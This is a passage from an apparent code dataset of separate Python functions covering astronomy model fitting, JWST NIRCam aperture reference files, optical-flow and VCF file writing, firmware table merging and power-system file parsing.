emcee.EnsembleSampler(nwalkers, ndim, log_posterior,\n args=[xx, yy, data, rn**2, peakrange, spot.shape, blurred],\n pool=pool)\n\n # Run a burn-in and set new starting position\n print \"Burning-in...\"\n pos, prob, state = sampler.run_mcmc(p0, burn)\n best_pos = sampler.flatchain[sampler.flatlnprobability.argmax()]\n print best_pos\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n pos = emcee.utils.sample_ball(best_pos, best_pos/100., size=nwalkers)\n sampler.reset()\n\n print \"Running an improved estimate...\"\n pos, prob, state = sampler.run_mcmc(pos, burn)\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n sampler.reset()\n print \"Running MCMC...\"\n pos, prob, state = sampler.run_mcmc(pos, run, rstate0=state)\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n\n #Get the index with the highest probability\n maxprob_index = np.argmax(prob)\n\n #Get the best parameters and their respective errors and print best fits\n params_fit = pos[maxprob_index]\n errors_fit = [sampler.flatchain[:,i].std() for i in xrange(ndim)]\n amplitudeE, center_xE, center_yE, radiusE, focusE, width_xE, width_yE = errors_fit\n _printResults(params_fit, errors_fit)\n\n #Best fit model\n peak, center_x, center_y, radius, focus, width_x, width_y = params_fit\n amplitude = _amplitudeFromPeak(peak, center_x, center_y, radius, x_0=CCDx, y_0=CCDy)\n airy = models.AiryDisk2D(amplitude, center_x, center_y, radius)\n adata = airy.eval(xx, yy, amplitude, center_x, center_y, radius).reshape(spot.shape)\n f = models.Gaussian2D(1., center_x, center_y, focus, focus, 0.)\n focusdata = f.eval(xx, yy, 1., center_x, center_y, focus, focus, 0.).reshape(spot.shape)\n foc = signal.convolve2d(adata, focusdata, mode='same')\n CCD = models.Gaussian2D(1., CCDx, CCDy, width_x, width_y, 0.)\n CCDdata = CCD.eval(xx, yy, 1., CCDx, CCDy, width_x, width_y, 0.).reshape(spot.shape)\n model = signal.convolve2d(foc, CCDdata, mode='same')\n #save model\n fileIO.writeFITS(model, out+'model.fits', int=False)\n\n #residuals\n fileIO.writeFITS(model - spot, out+'residual.fits', int=False)\n fileIO.writeFITS(((model - spot)**2 / var.reshape(spot.shape)), out+'residualSQ.fits', int=False)\n\n # a simple goodness of fit\n gof = (1./(np.size(data) - ndim)) * np.sum((model.flatten() - data)**2 / var)\n maxdiff = np.max(np.abs(model - spot))\n print 'GoF:', gof, ' Maximum difference:', maxdiff\n 
if maxdiff > 2e3 or gof > 4.:\n print '\\nFIT UNLIKELY TO BE GOOD...\\n'\n print 'Amplitude estimate:', amplitude\n\n #results and save results\n _printFWHM(width_x, width_y, errors_fit[5], errors_fit[6])\n res = dict(wx=width_x, wy=width_y, wxerr=width_xE, wyerr=width_yE, out=out,\n peakvalue=max, CCDmodel=CCD, CCDmodeldata=CCDdata, GoF=gof,\n maximumdiff=maxdiff, fit=params_fit)\n fileIO.cPickleDumpDictionary(res, out+'.pkl')\n\n #plot\n samples = sampler.chain.reshape((-1, ndim))\n extents = None\n if simulation:\n extents = [(0.91*truth, 1.09*truth) for truth in truths]\n extents[1] = (truths[1]*0.995, truths[1]*1.005)\n extents[2] = (truths[2]*0.995, truths[2]*1.005)\n extents[3] = (0.395, 0.425)\n extents[4] = (0.503, 0.517)\n truths[0] = _peakFromTruth(truths)\n print truths\n fig = triangle.corner(samples,\n labels=['peak', 'x', 'y', 'radius', 'focus', 'width_x', 'width_y'],\n truths=truths)#, extents=extents)\n fig.savefig(out+'Triangle.png')\n plt.close()\n pool.close()", "def generate_siaf_pre_flight_reference_files_nircam():\n\n instrument = 'NIRCam'\n overwrite_wedge_file = False\n overwrite_grism_file = False\n\n\n # wedge definitions\n wedge_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_wedge_offsets.txt'.format(instrument.lower()))\n\n if (not os.path.isfile(wedge_file) or (overwrite_wedge_file)):\n\n wedge_offsets = Table.read(os.path.join(JWST_SOURCE_DATA_ROOT, instrument, 'wedge_offsets.txt'), format='ascii.basic', delimiter=' ', guess=False)\n\n comments = []\n comments.append('{} detector parameter definition file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the wedge offsets.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n wedge_offsets.meta['comments'] = comments\n wedge_offsets.write(wedge_file, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False)\n\n # grism definitions\n grism_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_grism_parameters.txt'.format(instrument.lower()))\n\n if (not os.path.isfile(wedge_file) or (overwrite_grism_file)):\n # grism parameters, see WFSS worksheet in EXCEL SIAF\n grism_parameters = Table.read(grism_file, format='ascii.basic', delimiter=',', guess=False)\n\n # Save a backup copy of the grism file\n cmd = 'cp {} {}'.format(grism_file,os.path.join(JWST_TEMPORARY_DATA_ROOT, instrument, 'nircam_siaf_grism_parameters_backup.txt'))\n os.system(cmd)\n\n # different sign in Y for NRCB apertures\n factor = np.array(\n [1. if 'NRCA' in grism_parameters['aperture_name'][i] else -1. 
for i in range(len(grism_parameters))])\n\n for col in grism_parameters.colnames[1:]:\n # these are Sci coordinates\n if col[0] != 'D':\n if 'X' in col:\n grism_parameters['D{}'.format(col)] = grism_parameters[col].data - 1024.5\n elif 'Y' in col:\n grism_parameters['D{}'.format(col)] = factor * (grism_parameters[col].data - 1024.5)\n\n\n\n comments = []\n comments.append('{} grism parameter definition file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the grism parameters.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n grism_parameters.meta['comments'] = comments\n grism_parameters.write(grism_file, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False)\n\n # Transformation parameters, mapping used to select rows in cold_fit_[] file\n coldfit_name_mapping = {\n 'NRCA1_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA2_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA3_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA4_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA5_FULL' :{'degrees_to_mm':'OTESKYToNIRCAMALW_RT_20170307121022',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALWToOTESKY_RT_20170307121022',\n },\n 'NRCB1_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_1_20161025081604',\n 'pixels_to_mm':'NIRCAMBSW_1ToNIRCAMBSW_20161025081604',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB2_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_2_20161025081912',\n 'pixels_to_mm':'NIRCAMBSW_2ToNIRCAMBSW_20161025081912',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB3_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_3_20161025082300',\n 'pixels_to_mm':'NIRCAMBSW_3ToNIRCAMBSW_20161025082300',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB4_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_4_20161025082647',\n 'pixels_to_mm':'NIRCAMBSW_4ToNIRCAMBSW_20161025082647',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB5_FULL' :{'degrees_to_mm':'OTESKYToNIRCAMBLW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBLWToNIRCAMBLW_1_20161227162336',\n 'pixels_to_mm':'NIRCAMBLW_1ToNIRCAMBLW_20161227162336',\n 'mm_to_degrees':'NIRCAMBLWToOTESKY_RT_20170307121023',\n },\n 'NRCA1_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RNDNC_202110261138',\n 
'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASW_RNDNCToOTESKY_202110261138',\n },\n 'NRCA2_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASW_RNDToOTESKY_202005150434',\n },\n 'NRCA3_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RNDNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASW_RNDNCToOTESKY_202110261138',\n },\n 'NRCA4_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASW_RNDToOTESKY_202005150434',\n },\n 'NRCA1_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BARNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASW_BARNCToOTESKY_202110261138',\n },\n 'NRCA2_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BAR_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASW_BARToOTESKY_202005150434',\n },\n 'NRCA3_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BARNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASW_BARNCToOTESKY_202110261138',\n },\n 'NRCA4_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BAR_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASW_BARToOTESKY_202005150434',\n },\n 'NRCA5_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMALW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALW_RNDToOTESKY_202005150434',\n },\n 'NRCA5_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMALW_BAR_202005150434',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALW_BARToOTESKY_202005150434',\n }\n }\n\n # coldfit_source_data_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument, '{}'.format('cold_fit_201703071210.csv'))\n coldfit_source_data_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument, '{}'.format('nircam_cold_fit.txt'))\n print('NIRCam coldfit data from', coldfit_source_data_file)\n t = open(coldfit_source_data_file)\n coldfit_source_data = t.readlines()\n t.close()\n # remove comments from read content\n coldfit_source_data = [line for line in coldfit_source_data if line[0] != '#']\n\n siaf_detector_layout = iando.read.read_siaf_detector_layout()\n # siaf_alignment_parameters = iando.read.read_siaf_alignment_parameters(instrument)\n siaf_aperture_definitions = iando.read.read_siaf_aperture_definitions(instrument)\n # aperture_dict = {}\n aperture_name_list = siaf_aperture_definitions['AperName'].tolist()\n\n # generate alignment reference file, one file for all master apertures\n outfile = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_alignment.txt'.format(instrument.lower()))\n siaf_alignment = 
Table()\n\n for AperName in aperture_name_list:\n\n # process the master apertures of NIRCam\n if AperName in siaf_detector_layout['AperName']:\n (A, B, C, D, betaX, betaY, V2Ref, V3Ref) = nircam_get_polynomial_both(AperName, siaf_aperture_definitions, coldfit_name_mapping, coldfit_source_data)\n\n #generate distortion reference file\n number_of_coefficients = len(A)\n polynomial_degree = int((np.sqrt(8 * number_of_coefficients + 1) - 3) / 2)\n siaf_index = []\n exponent_x = []\n exponent_y = []\n for i in range(polynomial_degree + 1):\n for j in np.arange(i + 1):\n siaf_index.append('{:d}{:d}'.format(i, j))\n exponent_x.append(i - j)\n exponent_y.append(j)\n\n distortion_reference_table = Table((siaf_index, exponent_x, exponent_y, A, B, C, D), names=(\n 'siaf_index', 'exponent_x', 'exponent_y', 'Sci2IdlX', 'Sci2IdlY', 'Idl2SciX', 'Idl2SciY'))\n distortion_reference_table.add_column(\n Column([AperName] * len(distortion_reference_table), name='AperName'), index=0)\n distortion_reference_file_name = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_distortion_{}.txt'.format(instrument.lower(),\n AperName.lower()))\n # distortion_reference_table.pprint()\n comments = []\n comments.append('{} distortion reference file for SIAF\\n'.format(instrument))\n comments.append('Aperture: {}\\n'.format(AperName))\n comments.append('Based on coefficients given in {},'.format(os.path.basename(coldfit_source_data_file)))\n # comments.append('that were rescaled, shifted for a different reference pixel location, and rotated:')\n # comments.append('Rotation of {:2.3f} deg was removed and is carried separately in V3IdlYangle.'.format(\n # np.rad2deg(V3angle))) # *units.deg.to(units.arcsecond)\n # if 'may_2015' in distortion_file_name:\n # comments.append(\n # 'These parameters are stored in the currently (January 2018) active SIAF (PRDOPSSOC-G-012). 
')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n distortion_reference_table.meta['comments'] = comments\n distortion_reference_table.write(distortion_reference_file_name, format='ascii.fixed_width',\n delimiter=',', delimiter_pad=' ', bookend=False, overwrite=True)\n\n V3SciYAngle = betaY\n V3SciXAngle = betaX\n if np.abs(V3SciYAngle) < 90.:\n V3IdlYAngle = V3SciYAngle\n else:\n V3IdlYAngle = V3SciYAngle - np.sign(V3SciYAngle) * 180.\n\n if len(siaf_alignment) == 0: # first entry\n siaf_alignment['AperName'] = ['{:>30}'.format(AperName)]\n siaf_alignment['V3IdlYAngle'] = [V3IdlYAngle]\n siaf_alignment['V3SciXAngle'] = V3SciXAngle #[np.rad2deg(betaX)]\n siaf_alignment['V3SciYAngle'] = V3SciYAngle #[np.rad2deg(betaY)]\n siaf_alignment['V2Ref'] = [V2Ref]\n siaf_alignment['V3Ref'] = [V3Ref]\n else:\n siaf_alignment.add_row(['{:>30}'.format(AperName), V3IdlYAngle, V3SciXAngle, V3SciYAngle, V2Ref,V3Ref])\n comments = []\n comments.append('{} alignment parameter reference file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the focal plane alignment parameters of master apertures calibrated')\n comments.append('during FGS-SI alignment.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n siaf_alignment.meta['comments'] = comments\n siaf_alignment.write(outfile, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False, overwrite=True)", "def writeFlow(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write_to_vcf(self):\n\n # 1. 
Generate header info\n date_for_vcf = datetime.now().strftime('%Y%m%d')\n header_info = [\n '##fileformat=VCFv4.2',\n '##fileDate=%s' % date_for_vcf,\n '##source=%s' % self.get_analyser_name(),\n '##reference=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/bigZips/hg38.fa.gz',\n '##contig=<ID=chr1,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr1.fa.gz>',\n '##contig=<ID=chr2,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr2.fa.gz>',\n '##contig=<ID=chr3,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr3.fa.gz>',\n '##contig=<ID=chr4,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr4.fa.gz>',\n '##contig=<ID=chr5,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr5.fa.gz>',\n '##contig=<ID=chr6,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr6.fa.gz>',\n '##contig=<ID=chr7,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr7.fa.gz>',\n '##contig=<ID=chr8,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr8.fa.gz>',\n '##contig=<ID=chr9,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr9.fa.gz>',\n '##contig=<ID=chr10,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr10.fa.gz>',\n '##contig=<ID=chr11,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr11.fa.gz>',\n '##contig=<ID=chr12,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr12.fa.gz>',\n '##contig=<ID=chr13,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr13.fa.gz>',\n '##contig=<ID=chr14,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr14.fa.gz>',\n '##contig=<ID=chr15,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr15.fa.gz>',\n '##contig=<ID=chr16,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr16.fa.gz>',\n '##contig=<ID=chr17,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr17.fa.gz>',\n '##contig=<ID=chr18,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr18.fa.gz>',\n '##contig=<ID=chr19,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr19.fa.gz>',\n '##contig=<ID=chr20,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr20.fa.gz>',\n '##contig=<ID=chr21,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr21.fa.gz>',\n '##contig=<ID=chr22,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr22.fa.gz>',\n '##contig=<ID=chrM,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrM.fa.gz>',\n '##contig=<ID=chrX,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrX.fa.gz>',\n '##contig=<ID=chrY,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrY.fa.gz>',\n ]\n header_parameters = [\n '##FORMAT=<ID=GT,Number=1,Type=String,Description=\"Genotype\">',\n '##FORMAT=<ID=MTQ,Number=1,Type=String,Description=\"MassArray Typer quality value for SNP call. '\n 'A=Conservative, B=Moderate, C=Aggressive, D=Low Probability, E=User Call, i=Low Intensity. 
A and B are considered high '\n 'quality scores.\">',\n '##INFO=<ID=PCR,Number=2,Type=String,Description=\"PCR sequences used in assay.\">',\n '##INFO=<ID=AF,Number=A,Type=Float,Description=\"Minor allele frequency from population data.\">',\n '##INFO=<ID=Gene,Number=A,Type=String,Description=\"HGNC Gene Name for gene containing SNP.\">',\n '##INFO=<ID=Build,Number=A,Type=String,Description=\"Genome build used to determine SNP position for assay.\">',\n '##FILTER=<ID=LowCallRate,Description=\"SNP not called in at least 30% of samples in assay.\">',\n ]\n\n # 2. Extract info from XML file\n results = self.get_results()\n snps = self.get_snps()\n pcr_sequences = self.get_pcr_sequences()\n call_rates = self.get_snp_call_rate()\n\n # 3. For each sample, create VCF, add headers, determine genotype of each SNP and write to file.\n for sample, variants in results.items():\n\n with open(os.path.join(self.output, '%s.vcf' % sample), 'w+') as outfile:\n\n header_fields = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', str(sample)]\n\n outfile.write('%s\\n' % '\\n'.join(header_info))\n outfile.write('%s\\n' % '\\n'.join(header_parameters))\n outfile.write('#%s\\n' % '\\t'.join(header_fields))\n\n # for each variant, make a line to add to the file which will\n # then be sorted\n lines_to_write = []\n for snp, info in variants.items():\n\n ref_allele = snps[snp]['ref']\n alt_alleles = snps[snp]['alt']\n alt_list = alt_alleles.split(',')\n\n # Genotype formatting matches VCF v4.0 spec where ./. is no call.\n gt_list = []\n called_genotype = info['genotype']\n if not called_genotype:\n gt_list = ['.', '.']\n elif len(called_genotype) == 1:\n called_genotype += called_genotype\n for allele in list(called_genotype):\n if allele == ref_allele:\n gt_list.append(0)\n else:\n if allele in alt_list:\n idx = alt_list.index(allele)\n gt_list.append(idx + 1)\n else:\n raise ValueError(\n 'Called genotype %s not provided as possible alt in bed file. Sample %s and SNP '\n '%s %s.' 
% (called_genotype, sample, snp, alt_alleles)\n )\n gt = '/'.join([str(x) for x in gt_list])\n\n # Threshold currently set to 0.3 (70% results have a call).\n snp_call_rate = call_rates[snp]\n if snp_call_rate >= 0.3:\n vcf_filter = 'LowCallRate'\n else:\n vcf_filter = 'PASS'\n\n snp_pcr_seqs = pcr_sequences[snp]\n\n lines_to_write.append(\n '{chr}\\t{pos}\\t{id}\\t{ref}\\t{alt}\\t.\\t{filter}\\tAF={af};PCR={pcr};Gene={gene};Build={build}\\t'\n 'GT:MTQ\\t{gt}:{qual}\\n'.format(\n chr=snps[snp]['chrom'],\n pos=snps[snp]['pos'],\n id=snp,\n ref=ref_allele,\n alt=alt_alleles,\n filter=vcf_filter,\n af=snps[snp]['maf'],\n pcr=','.join(snp_pcr_seqs),\n gene=snps[snp]['gene'],\n build=snps[snp]['genome_build'],\n gt=gt,\n qual=','.join(info['quality'])\n )\n )\n\n sorted_lines_to_write = sorted(\n lines_to_write,\n key=lambda x: (\n # first key for sorting is the int value of chr\n int(x.split('\\t')[0][3:]),\n # second key for sorting is the position of the variant\n int(x.split('\\t')[1])\n )\n )\n\n for line in sorted_lines_to_write:\n outfile.write(line)", "def main(input_file, dtb_file):\n\n LOGGER.info(\"Reading: %s\" % dtb_file)\n with open(dtb_file, \"rb\") as max_table_file:\n LOGGER.info(\"max10_device_table.bin size: %x\" %\n os.path.getsize(max_table_file.name))\n LOGGER.info(\"Max max10 table size: %x\" % MAX10_TABLE_SIZE)\n if (os.path.getsize(max_table_file.name) > MAX10_TABLE_SIZE):\n raise Exception(LOGGER.error(\"max10_device_table.bin is too big\"))\n max10_table = max_table_file.read()\n\n LOGGER.info(\"Writing file: %s\" % input_file)\n with open(input_file, \"rb+\") as rpd_file:\n rpd_file.seek(MAX10_TABLE_START)\n rpd_file.write(bytearray(max10_table))\n LOGGER.info(\"Done merging Max10 device table\")", "def sample_vcf():\n file_content = b\"\"\"##fileformat=VCFv4.2\n##hailversion=0.2.100-2ea2615a797a\n##INFO=<ID=QUALapprox,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=SB,Number=.,Type=Integer,Description=\"\">\n##INFO=<ID=MQ,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=MQRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=VarDP,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_ReadPosRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_pab_max,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_QD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_MQ,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=QD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_MQRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=FS,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_FS,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=ReadPosRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_QUALapprox,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_SB_TABLE,Number=.,Type=Integer,Description=\"\">\n##INFO=<ID=AS_VarDP,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_SOR,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=SOR,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=singleton,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=transmitted_singleton,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=omni,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=mills,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=monoallelic,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=AS_VQSLOD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=InbreedingCoeff,Number=1,Type=Float,Description=\"\">\n##FILTER=<ID=AC0,Description=\"Allele count is zero after filtering out low-confidence genotypes (GQ < 20; DP < 10; and AB < 0.2 for het 
calls)\">\n##FILTER=<ID=AS_VQSR,Description=\"Failed VQSR filtering thresholds of -2.7739 for SNPs and -1.0606 for indels\">\n##contig=<ID=chr1,length=248956422,assembly=GRCh38>\n#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\nchr1\t10330\t.\tCCCCTAACCCTAACCCTAACCCTACCCTAACCCTAACCCTAACCCTAACCCTAA\tC\t.\tPASS\tQUALapprox=21493;SB=325,1077,113,694;MQ=32.1327;MQRankSum=0.720000;VarDP=2236;AS_ReadPosRankSum=-0.736000;AS_pab_max=1.00000;AS_QD=5.17857;AS_MQ=29.5449;QD=9.61225;AS_MQRankSum=0.00000;FS=8.55065;AS_FS=.;ReadPosRankSum=0.727000;AS_QUALapprox=145;AS_SB_TABLE=325,1077,2,5;AS_VarDP=28;AS_SOR=0.311749;SOR=1.48100;singleton;AS_VQSLOD=13.4641;InbreedingCoeff=-0.000517845\"\"\"\n file = io.BytesIO(file_content)\n return file", "def read(file):\n\n blocks = ['bus', 'load', 'fshunt', 'gen', 'branch', 'transf', 'area',\n 'twotermdc', 'vscdc', 'impedcorr', 'mtdc', 'msline', 'zone',\n 'interarea', 'owner', 'facts', 'swshunt', 'gne', 'Q']\n nol = [1, 1, 1, 1, 1, 4, 1,\n 0, 0, 0, 0, 0, 1,\n 0, 1, 0, 0, 0, 0]\n rawd = re.compile('rawd\\d\\d')\n\n retval = True\n version = 0\n b = 0 # current block index\n raw = {}\n for item in blocks:\n raw[item] = []\n\n data = []\n mdata = [] # multi-line data\n mline = 0 # line counter for multi-line models\n\n # parse file into raw with to_number conversions\n fid = open(file, 'r')\n for num, line in enumerate(fid.readlines()):\n line = line.strip()\n if num == 0: # get basemva and frequency\n data = line.split('/')[0]\n data = data.split(',')\n\n mva = float(data[1])\n freq = float(data[5])\n version = int(data[2])\n\n if not version:\n version = int(rawd.search(line).group(0).strip('rawd'))\n if version < 32 or version > 33:\n logging.warning('RAW file version is not 32 or 33. Error may occur.')\n continue\n elif num == 1: # store the case info line\n logging.info(line)\n continue\n elif num == 2:\n continue\n elif 